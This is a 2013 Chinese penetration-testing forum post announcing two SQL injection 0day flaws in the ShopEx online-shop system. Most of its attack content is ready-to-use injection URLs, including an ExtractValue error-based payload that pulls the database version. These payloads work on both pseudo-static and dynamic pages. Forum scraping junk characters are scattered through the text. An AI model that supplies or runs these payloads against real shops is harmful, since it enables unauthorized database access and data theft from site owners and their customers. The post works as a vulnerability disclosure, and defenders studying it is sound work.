中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]
作者: admin    时间: 2013-2-19 08:31
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 1 s# c; J( g4 G/ [. N

6 A4 S" O% Q5 Q( G& N好吧,我扯远了~~5 j+ ^+ J  h" {. @
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
  Q- @  X+ m$ _; [; e不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
1 n/ h# E' J* [, ^$ T; y6 J
" j, f) L2 n* x% [; h1 t* Xhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html . q7 B4 W' Y% }% j# F

: D2 g! ], Z  }9 Lhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ' l( k+ X8 F' J) S1 v! _; D

2 N4 K3 s4 j) X. l- Yhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 1 ]/ c4 o) V7 }6 g) T# r$ g9 T. Y, K

5 r9 R2 Y3 O# J9 ^8 ^% R! p( W3 b, Uhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
& v9 [) d2 k- l1 g% ?/ H& y2 [
& t" o9 q0 y% ]# B% f& L( d
/ E# x7 ?& d3 l3 `& e2 m一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
( S* T/ x+ d8 N如何注入就不多说了,10多年的东西了…不会也会了…
* w% u3 d, ^4 U" t% p3 U1 W! m, l, S$ U  I: M
" l$ P" S+ A2 c- J1 s* s, W* u/ E
( X: m" ?9 \8 W9 [5 e" m

6 Y. \$ E) _- T2 ^: B6 A$ @5 K



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2